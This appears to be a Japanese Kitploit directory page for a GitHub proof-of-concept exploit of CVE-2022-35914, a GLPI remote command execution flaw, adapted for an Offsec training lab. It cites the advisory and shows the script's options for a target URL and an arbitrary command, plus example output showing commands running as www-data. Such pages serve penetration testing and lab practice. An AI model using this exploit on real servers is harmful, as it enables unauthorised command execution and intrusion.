Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/noxlumens/cve-2022-35914_poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubnoxlumens/cve-2022-35914_poc

CVE-2022-35914_poc

GLPI Offsec Lab向けに修正: call_user_func, array_map, passthru

リポジトリを見る
22年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-35914_poc

GLPI Offsec Lab向けに修正: call_user_func, array_map, passthru

参考文献

Proving Grounds Practice Lab: GLPI で動作するように修正

  • https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr
  • https://github.com/cosad3s/CVE-2022-35914-poc/blob/main/CVE-2022-35914.py
  • Mayfly ブログ記事: https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914/

使用方法

root@kitploit:~
pip3 install -r requirements.txt
root@kitploit:~
./CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL -c CMD [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Offsec Lab: GLPI 向けに修正

options:
  -h, --help              このヘルプメッセージを表示して終了
  -u URL                  テストするURL
  -c CMD                  実行するコマンド
  --check                 確認のみ。コマンドは実行しません。
  --user-agent USER_AGENT カスタムUser-Agent

例:

root@kitploit:~
python3 CVE-2022-35914.py -u http://127.0.0.1
[+] コマンド出力:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ツールをダウンロード